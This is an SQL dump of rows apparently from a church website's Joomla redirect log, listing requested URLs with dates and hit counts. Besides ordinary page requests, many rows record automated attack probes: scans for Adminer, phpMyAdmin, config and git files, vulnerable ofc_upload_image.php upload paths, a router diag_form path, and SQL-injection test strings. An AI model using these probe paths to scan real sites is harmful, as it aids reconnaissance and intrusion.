(9954, 'https://lifeoasisinternationalchurch.org/models.php', NULL, 'http://site.ru', '', 1, 0, '2018-12-04 12:33:58', '0000-00-00 00:00:00', 301),
(9955, 'https://lifeoasisinternationalchurch.org/wp-admin/admin-ajax.php', NULL, '', '', 1, 0, '2018-12-04 12:35:21', '0000-00-00 00:00:00', 301),
(9956, 'https://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/captcha/94896', NULL, '', '', 1, 0, '2018-12-04 13:16:51', '0000-00-00 00:00:00', 301),
(9957, 'https://142.4.21.132//vtigercrm/vtigerservice.php', NULL, '', '', 18, 0, '2018-12-04 14:33:12', '0000-00-00 00:00:00', 301),
(9958, 'https://142.4.21.132//recordings/', NULL, '', '', 11, 0, '2018-12-04 20:38:41', '0000-00-00 00:00:00', 301),
(9959, 'https://lifeoasisinternationalchurch.org/media/system/media.php', NULL, 'http://site.ru', '', 1, 0, '2018-12-05 11:18:07', '0000-00-00 00:00:00', 301),
(9960, 'https://lifeoasisinternationalchurch.org/joomla.php', NULL, 'http://site.ru', '', 1, 0, '2018-12-05 16:37:32', '0000-00-00 00:00:00', 301),
(9961, 'https://www.lifeoasisinternationalchurch.org/streaming0', NULL, '', '', 1, 0, '2018-12-05 16:58:36', '0000-00-00 00:00:00', 301),
(9962, 'https://lifeoasisinternationalchurch.org/life streaminng', NULL, '', '', 1, 0, '2018-12-05 17:46:59', '0000-00-00 00:00:00', 301),
(9963, 'https://lifeoasisinternationalchurch.org/34thministryanniversary', NULL, '', '', 1, 0, '2018-12-05 18:50:23', '0000-00-00 00:00:00', 301),
(9964, 'https://lifeoasisinternationalchurch.org/34thministryanniversary/', NULL, '', '', 1, 0, '2018-12-05 18:50:37', '0000-00-00 00:00:00', 301),
(9965, 'https://lifeoasisinternationalchurch.org/34thanniversary/', NULL, '', '', 1, 0, '2018-12-05 18:50:51', '0000-00-00 00:00:00', 301),
(9966, 'https://lifeoasisinternationalchurch.org/yt-assets/logo_img.php', NULL, 'http://site.ru', '', 1, 0, '2018-12-05 19:14:14', '0000-00-00 00:00:00', 301),
(9967, 'https://lifeoasisinternationalchurch.org/newsfeeds/popup-pomo.php', NULL, 'http://site.ru', '', 3, 0, '2018-12-06 08:09:46', '0000-00-00 00:00:00', 301),
(9968, 'https://lifeoasisinternationalchurch.org/media/css.php', NULL, 'http://site.ru', '', 1, 0, '2018-12-06 10:20:04', '0000-00-00 00:00:00', 301),
(9969, 'https://lifeoasisinternationalchurch.org/opalubka-moscow.ru/themes/popup-pomo.php', NULL, 'http://site.ru', '', 1, 0, '2018-12-06 11:48:28', '0000-00-00 00:00:00', 301),
(9970, 'https://lifeoasisinternationalchurch.org/newsleter.php', NULL, 'http://site.ru', '', 2, 0, '2018-12-06 12:15:06', '0000-00-00 00:00:00', 301),
(9971, 'https://lifeoasisinternationalchurch.org/language/live.php', NULL, 'http://site.ru', '', 2, 0, '2018-12-06 13:56:56', '0000-00-00 00:00:00', 301),
(9972, 'https://lifeoasisinternationalchurch.org/adminer', NULL, 'http://lifeoasisinternationalchurch.org/adminer', '', 3, 0, '2018-12-06 18:22:59', '0000-00-00 00:00:00', 301),
(9973, 'https://167.99.217.117:443/gponform/diag_form?style/', NULL, '', '', 1, 0, '2018-12-06 18:37:51', '0000-00-00 00:00:00', 301),
(9974, 'https://lifeoasisinternationalchurch.org/2thanniversary', NULL, '', '', 1, 0, '2018-12-07 17:40:58', '0000-00-00 00:00:00', 301),
(9975, 'https://www.lifeoasisinternationalchurch.org/streaming/private/', NULL, '', '', 1, 0, '2018-12-07 22:33:10', '0000-00-00 00:00:00', 301),
(9976, 'https://www.lifeoasisinternationalchurch.org/ streaming', NULL, '', '', 2, 0, '2018-12-08 05:16:21', '0000-00-00 00:00:00', 301),
(9977, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticket&requestdata=[{\"train_date\":\"20181219\",\"purpose_codes\":\"00\",\"from_station\":\"csq\",\"to_station\":\"szh\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"b0f5fa830c1e044b87db414ae7a08a0a\",\"device_no\":\"109d1448bf1160dbcb55657897c1879b\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20181209142149\",\"user_name\":\"\",\"version_no\":\"4.0.14\"}}]&ts=1544336509152&sign=', NULL, '', '', 1, 0, '2018-12-09 06:21:47', '0000-00-00 00:00:00', 301),
(9978, 'https://142.4.21.132//about.php', NULL, '', '', 4, 0, '2018-12-10 02:31:07', '0000-00-00 00:00:00', 301),
(9979, 'https://lifeoasisinternationalchurch.org/.cpanel_config.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2018-12-11 10:03:44', '0000-00-00 00:00:00', 301),
(9980, 'https://lifeoasisinternationalchurch.org/.config.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2018-12-11 10:04:00', '0000-00-00 00:00:00', 301),
(9981, 'https://www.lifeoasisinternationalchurch.org/destiny', NULL, '', '', 1, 0, '2018-12-11 20:14:56', '0000-00-00 00:00:00', 301),
(9982, 'https://142.4.21.132/nmaplowercheck1544607305', NULL, '', '', 1, 0, '2018-12-12 09:35:04', '0000-00-00 00:00:00', 301),
(9983, 'https://www.lifeoasisinternationalchurch.org/sindex.php', NULL, '', '', 2, 0, '2018-12-12 17:16:12', '0000-00-00 00:00:00', 301),
(9984, 'https://lifeoasisinternationalchurch.org/wp-config-sample.php', NULL, '', '', 1, 0, '2018-12-13 06:00:45', '0000-00-00 00:00:00', 301),
(9985, 'https://mail.lifeoasisinternationalchurch.org//wp-login.php', NULL, 'http://www.google.com.hk', '', 2, 0, '2018-12-13 21:54:21', '0000-00-00 00:00:00', 301),
(9986, 'https://mail.lifeoasisinternationalchurch.org//xmlrpc.php', NULL, 'http://www.google.com.hk', '', 1, 0, '2018-12-13 21:54:46', '0000-00-00 00:00:00', 301),
(9987, 'https://lifeoasisinternationalchurch.org/streamingyou', NULL, '', '', 1, 0, '2018-12-14 05:40:53', '0000-00-00 00:00:00', 301),
(9988, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticket&requestdata=[{\"train_date\":\"20181224\",\"purpose_codes\":\"00\",\"from_station\":\"csq\",\"to_station\":\"szh\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"aa3e65cb4257afde7a7ec3dcbe10db0d\",\"device_no\":\"46a9e8ab94574b9997e73f08eaf8cf82\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20181214141643\",\"user_name\":\"\",\"version_no\":\"4.0.14\"}}]&ts=1544768203348&sign=', NULL, '', '', 1, 0, '2018-12-14 06:16:41', '0000-00-00 00:00:00', 301),
(9989, 'https://lifeoasisinternationalchurch.org/live2.php', NULL, '', '', 1, 0, '2018-12-14 21:46:28', '0000-00-00 00:00:00', 301),
(9990, 'https://qtm.fadv.com/taskmanager-admin/', NULL, '', '', 1, 0, '2018-12-14 21:56:14', '0000-00-00 00:00:00', 301),
(9991, 'https://lifeoasisinternationalchurch.org/resources/live-stream', NULL, '', '', 1, 0, '2018-12-15 08:57:17', '0000-00-00 00:00:00', 301),
(9992, 'https://www.lifeoasisinternationalchurch.org/resources/live-stream', NULL, '', '', 1, 0, '2018-12-15 08:57:44', '0000-00-00 00:00:00', 301),
(9993, 'https://www.lifeoasisinternationalchurch.org/livestreaming/?fbclid=iwar17yfwkw2rdkomm5xi450l2umsla7l4lvtmjac0u7mawqgxte0mva2xoao', NULL, 'https://lm.facebook.com/l.php?u=http%3A%2F%2Fwww.lifeoasisinternationalchurch.org%2Flivestreaming%2F%3Ffbclid%3DIwAR17yFWKw2rDKOmM5xI450L2Umsla7l4lvTMjAc0u7maWQGxTe0mvA2xOAo&h=AT0iTrrpV3SBtCw9DgKI4rPR4n_I5hvftoaE12F9NN3Hb6DQMta1Gu9kaP4MMrtpOBuuSVi3b_G2ET8zVUSWo2CcToTNvzr-NFzkKvAHhHfajx54M_ySiq8bx65h84sMzuGqHKdAfsP6ILcJqw', '', 3, 0, '2018-12-15 10:08:31', '0000-00-00 00:00:00', 301),
(9994, 'https://www.lifeoasisinternationalchurch.org/livestreaming/?fbclid=iwar2o47ykpdu2smmnqm9lo3a3hr4w2qmwq50gfbbkjaptcbu_scrctnwpuhg', NULL, 'https://lm.facebook.com/l.php?u=http%3A%2F%2Fwww.lifeoasisinternationalchurch.org%2Flivestreaming%2F%3Ffbclid%3DIwAR2O47YKPDU2Smmnqm9lo3a3HR4w2QmwQ50GFBbKJAPtcBu_scrCTnWPUHg&h=AT2F4pLArTr5fY6ysliZWawE7LHUGlSdcmHkY3QKAhj6aMPUWKkQF-GXD4QEyzFXCKF_FNzdO5p1nSk4zJjdcrfRl47_jmA7VOe4RTvlEa9IbU6Ct9lNfZR33fscYM4a0hWwhaLCIs7hmHr9KA', '', 3, 0, '2018-12-15 10:08:50', '0000-00-00 00:00:00', 301),
(9995, 'https://www.lifeoasisinternationalchurch.org/livestreaming/', NULL, 'https://l.facebook.com/', '', 2, 0, '2018-12-15 11:40:26', '0000-00-00 00:00:00', 301),
(9996, 'https://142.4.21.132/nmaplowercheck1545037351', NULL, '', '', 1, 0, '2018-12-17 09:02:31', '0000-00-00 00:00:00', 301),
(9997, 'https://lifeoasisinternationalchurch.org/site/login', NULL, 'https://lifeoasisinternationalchurch.org/site/login', '', 1, 0, '2018-12-18 19:32:43', '0000-00-00 00:00:00', 301),
(9998, 'https://lifeoasisinternationalchurch.org/adminer-4.7.0.php', NULL, 'http://lifeoasisinternationalchurch.org/adminer-4.7.0.php', '', 1, 0, '2018-12-19 09:14:05', '0000-00-00 00:00:00', 301),
(9999, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content\'[0] &view=article&id=13&itemid=213', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content\'[0] &view=article&id=13&Itemid=213', '', 1, 0, '2018-12-19 17:44:11', '0000-00-00 00:00:00', 301),
(10000, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'[0] &id=13&itemid=213', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'[0] &id=13&Itemid=213', '', 1, 0, '2018-12-19 17:44:12', '0000-00-00 00:00:00', 301),
(10001, 'https://lifeoasisinternationalchurch.org/audiomessages/downloads', NULL, '', '', 1, 0, '2018-12-20 17:17:50', '0000-00-00 00:00:00', 301),
(10002, 'https://www.lifeoasisinternationalchurch.org/atom', NULL, 'http://www.lifeoasisinternationalchurch.org/atom', '', 1, 0, '2018-12-21 09:03:07', '0000-00-00 00:00:00', 301),
(10003, 'https://lifeoasisinternationalchurch.org/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:15', '0000-00-00 00:00:00', 301),
(10004, 'https://lifeoasisinternationalchurch.org/admin//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:16', '0000-00-00 00:00:00', 301),
(10005, 'https://lifeoasisinternationalchurch.org/cgi-bin/awstats//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:18', '0000-00-00 00:00:00', 301),
(10006, 'https://lifeoasisinternationalchurch.org/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:19', '0000-00-00 00:00:00', 301),
(10007, 'https://lifeoasisinternationalchurch.org/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:20', '0000-00-00 00:00:00', 301),
(10008, 'https://lifeoasisinternationalchurch.org/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:21', '0000-00-00 00:00:00', 301),
(10009, 'https://lifeoasisinternationalchurch.org/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:22', '0000-00-00 00:00:00', 301),
(10010, 'https://lifeoasisinternationalchurch.org/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:23', '0000-00-00 00:00:00', 301),
(10011, 'https://lifeoasisinternationalchurch.org/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:25', '0000-00-00 00:00:00', 301),
(10012, 'https://lifeoasisinternationalchurch.org/admin_area/charts/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:26', '0000-00-00 00:00:00', 301),
(10013, 'https://lifeoasisinternationalchurch.org/administrator/components/com_jnewsletter/includes/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:27', '0000-00-00 00:00:00', 301),
(10014, 'https://lifeoasisinternationalchurch.org/administrator/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:28', '0000-00-00 00:00:00', 301),
(10015, 'https://lifeoasisinternationalchurch.org/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:29', '0000-00-00 00:00:00', 301),
(10016, 'https://lifeoasisinternationalchurch.org/administrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:30', '0000-00-00 00:00:00', 301),
(10017, 'https://lifeoasisinternationalchurch.org/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php', NULL, '', '', 1, 0, '2018-12-22 13:51:31', '0000-00-00 00:00:00', 301),
(10018, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=oxiohodrtqm', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-12-22 22:07:22', '0000-00-00 00:00:00', 301),
(10019, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/20-prayer-a-fasting-day-11', NULL, '', '', 6, 0, '2018-12-23 04:15:59', '0000-00-00 00:00:00', 301),
(10020, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/7-enemies-of-gods-word-1', NULL, '', '', 3, 0, '2018-12-24 21:01:48', '0000-00-00 00:00:00', 301),
(10021, 'https://www.lifeoasisinternationalchurch.org/private-streaminglive2018', NULL, '', '', 1, 0, '2018-12-25 06:43:58', '0000-00-00 00:00:00', 301),
(10022, 'https://lifeoasisinternationalchurch.org/adminer-4.2.2-mysql.php', NULL, 'http://lifeoasisinternationalchurch.org/adminer-4.2.2-mysql.php', '', 1, 0, '2018-12-25 22:12:15', '0000-00-00 00:00:00', 301),
(10023, 'https://lifeoasisinternationalchurch.org/anw2018', NULL, '', '', 1, 0, '2018-12-26 12:10:41', '0000-00-00 00:00:00', 301),
(10024, 'https://lifeoasisinternationalchurch.org/anwc2018', NULL, '', '', 2, 0, '2018-12-26 12:11:06', '0000-00-00 00:00:00', 301),
(10025, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming/audio', NULL, '', '', 1, 0, '2018-12-26 17:28:50', '0000-00-00 00:00:00', 301),
(10026, 'https://lifeoasisinternationalchurch.org/zoom', NULL, '', '', 1, 0, '2018-12-27 06:13:41', '0000-00-00 00:00:00', 301),
(10027, 'https://www.lifeoasisinternationalchurch.org/resources/private/livestreaming', NULL, '', '', 1, 0, '2018-12-27 07:52:00', '0000-00-00 00:00:00', 301),
(10028, 'https://142.4.21.132/api/v1/pods', NULL, '', '', 11, 0, '2018-12-27 23:17:16', '0000-00-00 00:00:00', 301),
(10029, 'https://music.lifeoasisinternationalchurch.org/resources/vod', NULL, '', '', 6, 0, '2018-12-29 02:45:34', '0000-00-00 00:00:00', 301),
(10030, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=3j4ea3nggl8', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-12-29 22:01:08', '0000-00-00 00:00:00', 301),
(10031, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/mp3-messages/speaker/1-rev-mrs-oyenike-areogun/popup', NULL, '', '', 2, 0, '2018-12-29 22:09:24', '0000-00-00 00:00:00', 301),
(10032, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/mp3-messages', NULL, '', '', 20, 0, '2018-12-30 00:10:08', '0000-00-00 00:00:00', 301),
(10033, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/component/content/article/18-wifi-zion/41-branches', NULL, '', '', 2, 0, '2018-12-30 00:59:52', '0000-00-00 00:00:00', 301),
(10034, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/component/content/category/18-wifi-zion', NULL, '', '', 1, 0, '2018-12-30 00:59:58', '0000-00-00 00:00:00', 301),
(10035, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/tutorials/rev-olusola-ayodele-areogun', NULL, '', '', 1, 0, '2018-12-30 02:22:49', '0000-00-00 00:00:00', 301),
(10036, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/partnership1/18-wifi-zion/41-branches', NULL, 'https://www.google.com/', '', 6, 0, '2018-12-30 05:02:44', '0000-00-00 00:00:00', 301),
(10037, 'https://lifeoasisinternationalchurch.org/wifizion/index.php?option=com_komento&controller=captcha&captcha-id=10020&tmpl=component', NULL, '', '', 1, 0, '2018-12-30 05:27:12', '0000-00-00 00:00:00', 301),
(10038, 'https://lifeoasisinternationalchurch.org/wifizion/index.php?option=com_komento&controller=captcha&captcha-id=9993&tmpl=component', NULL, '', '', 1, 0, '2018-12-30 05:34:03', '0000-00-00 00:00:00', 301),
(10039, 'https://lifeoasisinternationalchurch.org/privatew', NULL, '', '', 1, 0, '2018-12-30 06:40:44', '0000-00-00 00:00:00', 301),
(10040, 'https://lifeoasisinternationalchurch.org/wifizion/index.php?option=com_komento&controller=captcha&captcha-id=9997&tmpl=component', NULL, '', '', 1, 0, '2018-12-30 07:08:21', '0000-00-00 00:00:00', 301),
(10041, 'https://lifeoasisinternationalchurch.org/wifizion/index.php?option=com_komento&controller=captcha&captcha-id=9995&tmpl=component', NULL, '', '', 1, 0, '2018-12-30 08:41:20', '0000-00-00 00:00:00', 301),
(10042, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/mp3-messages/feed?format=raw&catid=19', NULL, '', '', 2, 0, '2018-12-30 10:23:16', '0000-00-00 00:00:00', 301),
(10043, 'https://lifeoasisinternationalchurch.org/wifizion/index.php?option=com_sermonspeaker&view=sermon&id=7', NULL, '', '', 1, 0, '2018-12-30 11:35:16', '0000-00-00 00:00:00', 301),
(10044, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/tutorials/the-church', NULL, '', '', 3, 0, '2018-12-30 11:35:17', '0000-00-00 00:00:00', 301),
(10045, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/component/content/article/20-general-category/53-alone-with-god-how-important-xi', NULL, '', '', 1, 0, '2018-12-30 12:35:38', '0000-00-00 00:00:00', 301),
(10046, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/mp3-messages/sermon/5-the-generation-of-achsah?layout=popup&tmpl=component', NULL, '', '', 1, 0, '2018-12-30 14:03:32', '0000-00-00 00:00:00', 301),
(10047, 'https://lifeoasisinternationalchurch.org/wifizion/index.php?option=com_komento&controller=captcha&captcha-id=9675&tmpl=component', NULL, '', '', 5, 0, '2018-12-30 14:24:59', '0000-00-00 00:00:00', 301),
(10048, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/partnership1/18-wifi-zion', NULL, '', '', 1, 0, '2018-12-30 15:55:47', '0000-00-00 00:00:00', 301),
(10049, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/component/content/category/8-loic', NULL, '', '', 1, 0, '2018-12-30 16:36:32', '0000-00-00 00:00:00', 301),
(10050, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/18-wifi-zion/34-wife-of-ministers-of-the-gospel-outline', NULL, '', '', 1, 0, '2018-12-30 16:36:40', '0000-00-00 00:00:00', 301),
(10051, 'https://www.lifeoasisinternationalchurch.org/__media__/js/netsoltrademark.php?d=zkdwqlrq.gq', NULL, '', '', 2, 0, '2018-12-30 18:06:23', '0000-00-00 00:00:00', 301),
(10052, 'https://lifeoasisinternationalchurch.org/__media__/js/netsoltrademark.php?d=zkdwqlrq.gq', NULL, '', '', 2, 0, '2018-12-30 18:06:23', '0000-00-00 00:00:00', 301),
(10053, 'https://www.lifeoasisinternationalchurch.org/components/com_foxcontact/', NULL, '', '', 1, 0, '2018-12-30 18:54:10', '0000-00-00 00:00:00', 301),
(10054, 'https://lifeoasisinternationalchurch.org/wifizion/index.php?option=com_komento&controller=captcha&captcha-id=10084&tmpl=component', NULL, '', '', 2, 0, '2018-12-31 05:38:15', '0000-00-00 00:00:00', 301),
(10055, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/18-wifi-zion/44-daughters-of-destiny', NULL, '', '', 1, 0, '2018-12-31 07:11:36', '0000-00-00 00:00:00', 301),
(10056, 'https://lifeoasisinternationalchurch.org/wifizion/index.php/video-ministration/youtubegallery?videoid=3xj0luxdhqi', NULL, '', '', 1, 0, '2018-12-31 12:06:59', '0000-00-00 00:00:00', 301),
(10057, 'https://lifeoasisinternationalchurch.org/streaming 31 dec 18', NULL, '', '', 1, 0, '2019-01-01 02:00:45', '0000-00-00 00:00:00', 301),
(10058, 'https://lifeoasisinternationalchurch.org/webalizer/usage_201811.html', NULL, '', '', 2, 0, '2019-01-01 03:42:29', '0000-00-00 00:00:00', 301),
(10059, 'https://lifeoasisinternationalchurch.org/plesk-stat/webstat/usage_201811.html', NULL, '', '', 2, 0, '2019-01-01 03:42:29', '0000-00-00 00:00:00', 301),
(10060, 'https://lifeoasisinternationalchurch.org/webstat/usage_201811', NULL, '', '', 2, 0, '2019-01-01 03:42:29', '0000-00-00 00:00:00', 301),
(10061, 'https://lifeoasisinternationalchurch.org/adminer-4.0.3-mysql.php', NULL, '', '', 2, 0, '2019-01-01 04:32:48', '0000-00-00 00:00:00', 301),
(10062, 'https://lifeoasisinternationalchurch.org/adminer-4.0.3.php', NULL, '', '', 2, 0, '2019-01-01 04:32:50', '0000-00-00 00:00:00', 301),
(10063, 'https://lifeoasisinternationalchurch.org/adminer-4.1.0-mysql.php', NULL, '', '', 2, 0, '2019-01-01 04:32:51', '0000-00-00 00:00:00', 301),
(10064, 'https://lifeoasisinternationalchurch.org/adminer-4.1.0.php', NULL, '', '', 2, 0, '2019-01-01 04:32:52', '0000-00-00 00:00:00', 301),
(10065, 'https://lifeoasisinternationalchurch.org/adminer-4.2.0-mysql.php', NULL, '', '', 2, 0, '2019-01-01 04:32:54', '0000-00-00 00:00:00', 301),
(10066, 'https://lifeoasisinternationalchurch.org/adminer-4.2.0.php', NULL, '', '', 2, 0, '2019-01-01 04:32:55', '0000-00-00 00:00:00', 301),
(10067, 'https://lifeoasisinternationalchurch.org/.git2/index', NULL, '', '', 1, 0, '2019-01-01 04:34:05', '0000-00-00 00:00:00', 301),
(10068, 'https://lifeoasisinternationalchurch.org/gobc-2018/wp-login.php', NULL, '', '', 1, 0, '2019-01-01 08:45:25', '0000-00-00 00:00:00', 301),
(10069, 'https://www.lifeoasisinternationalchurch.org/audio', NULL, '', '', 1, 0, '2019-01-02 16:20:38', '0000-00-00 00:00:00', 301),
(10070, 'https://kyfw.12306.cn/otn/leftticket/queryz?leftticketdto.train_date=2019-01-27&leftticketdto.from_station=bjp&leftticketdto.to_station=tjp&purpose_codes=adult', NULL, 'https://kyfw.12306.cn/otn/leftTicket/init', '', 1, 0, '2019-01-03 09:48:20', '0000-00-00 00:00:00', 301),
(10071, 'https://www.lifeoasisinternationalchurch.org/resources/livg', NULL, '', '', 1, 0, '2019-01-04 23:53:43', '0000-00-00 00:00:00', 301),
(10072, 'https://lifeoasisinternationalchurch.org/resources/live-streamingi', NULL, '', '', 1, 0, '2019-01-06 10:40:58', '0000-00-00 00:00:00', 301),
(10073, 'https://lifeoasisinternationalchurch.org/wifi-zion', NULL, '', '', 4, 0, '2019-01-06 19:34:27', '0000-00-00 00:00:00', 301),
(10074, 'https://lifeoasisinternationalchurch.org/wifi zion', NULL, '', '', 1, 0, '2019-01-06 19:40:02', '0000-00-00 00:00:00', 301),
(10075, 'https://www.lifeoasisinternationalchurch.org/you', NULL, '', '', 1, 0, '2019-01-06 20:24:32', '0000-00-00 00:00:00', 301),
(10076, 'https://lifeoasisinternationalchurch.org/wifizone/downloads', NULL, '', '', 1, 0, '2019-01-06 21:27:26', '0000-00-00 00:00:00', 301),
(10077, 'https://lifeoasisinternationalchurch.org/uptimebot', NULL, '', '', 3, 0, '2019-01-06 23:56:48', '0000-00-00 00:00:00', 301),
(10078, 'https://lifeoasisinternationalchurch.org/uptimebotorg', NULL, '', '', 3, 0, '2019-01-06 23:56:50', '0000-00-00 00:00:00', 301),
(10079, 'https://lifeoasisinternationalchurch.org/uptimebot-org', NULL, '', '', 3, 0, '2019-01-06 23:56:53', '0000-00-00 00:00:00', 301),
(10080, 'https://lifeoasisinternationalchurch.org/uptimebot_org', NULL, '', '', 3, 0, '2019-01-06 23:56:55', '0000-00-00 00:00:00', 301),
(10081, 'https://lifeoasisinternationalchurch.org/uptimebot%org', NULL, '', '', 3, 0, '2019-01-06 23:56:57', '0000-00-00 00:00:00', 301),
(10082, 'https://lifeoasisinternationalchurch.org/uptimebot+org', NULL, '', '', 3, 0, '2019-01-06 23:56:59', '0000-00-00 00:00:00', 301),
(10083, 'https://lifeoasisinternationalchurch.org/uptimebot/org', NULL, '', '', 3, 0, '2019-01-06 23:57:01', '0000-00-00 00:00:00', 301),
(10084, 'https://lifeoasisinternationalchurch.org/uptimebot.php', NULL, '', '', 3, 0, '2019-01-06 23:57:03', '0000-00-00 00:00:00', 301),
(10085, 'https://lifeoasisinternationalchurch.org/uptimebotorg.php', NULL, '', '', 3, 0, '2019-01-06 23:57:05', '0000-00-00 00:00:00', 301),
(10086, 'https://lifeoasisinternationalchurch.org/uptimebot.org.php', NULL, '', '', 3, 0, '2019-01-06 23:57:07', '0000-00-00 00:00:00', 301),
(10087, 'https://lifeoasisinternationalchurch.org/http://uptimebot.org.php', NULL, '', '', 3, 0, '2019-01-06 23:57:08', '0000-00-00 00:00:00', 301),
(10088, 'https://lifeoasisinternationalchurch.org/uptimebot-org.php', NULL, '', '', 3, 0, '2019-01-06 23:57:10', '0000-00-00 00:00:00', 301),
(10089, 'https://lifeoasisinternationalchurch.org/uptimebot_org.php', NULL, '', '', 2, 0, '2019-01-06 23:57:12', '0000-00-00 00:00:00', 301),
(10090, 'https://lifeoasisinternationalchurch.org/uptimebot%org.php', NULL, '', '', 1, 0, '2019-01-06 23:57:14', '0000-00-00 00:00:00', 301),
(10091, 'https://lifeoasisinternationalchurch.org/uptimebot+org.php', NULL, '', '', 1, 0, '2019-01-06 23:57:16', '0000-00-00 00:00:00', 301),
(10092, 'https://lifeoasisinternationalchurch.org/uptimebot/org.php', NULL, '', '', 1, 0, '2019-01-06 23:57:18', '0000-00-00 00:00:00', 301),
(10093, 'https://lifeoasisinternationalchurch.org/org.php', NULL, '', '', 1, 0, '2019-01-06 23:57:20', '0000-00-00 00:00:00', 301),
(10094, 'https://142.4.21.132/phpmyadmin/', NULL, 'https://142.4.21.132/', '', 6, 0, '2019-01-08 14:36:12', '0000-00-00 00:00:00', 301),
(10095, 'https://142.4.21.132/pma/', NULL, 'https://142.4.21.132/', '', 4, 0, '2019-01-08 14:36:14', '0000-00-00 00:00:00', 301),
(10096, 'https://142.4.21.132/admin/', NULL, 'https://142.4.21.132/', '', 3, 0, '2019-01-08 14:36:15', '0000-00-00 00:00:00', 301),
(10097, 'https://142.4.21.132/dbadmin/', NULL, 'https://142.4.21.132/', '', 3, 0, '2019-01-08 14:36:15', '0000-00-00 00:00:00', 301),
(10098, 'https://142.4.21.132/mysql/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:16', '0000-00-00 00:00:00', 301),
(10099, 'https://142.4.21.132/myadmin/', NULL, 'https://142.4.21.132/', '', 3, 0, '2019-01-08 14:36:17', '0000-00-00 00:00:00', 301),
(10100, 'https://142.4.21.132/openserver/phpmyadmin/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:17', '0000-00-00 00:00:00', 301),
(10101, 'https://142.4.21.132/phpmyadmin2/', NULL, 'https://142.4.21.132/', '', 2, 0, '2019-01-08 14:36:18', '0000-00-00 00:00:00', 301),
(10102, 'https://142.4.21.132/phpmyadmin-2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:19', '0000-00-00 00:00:00', 301),
(10103, 'https://142.4.21.132/php-my-admin/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:20', '0000-00-00 00:00:00', 301),
(10104, 'https://142.4.21.132/phpmyadmin-2.2.3/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:22', '0000-00-00 00:00:00', 301),
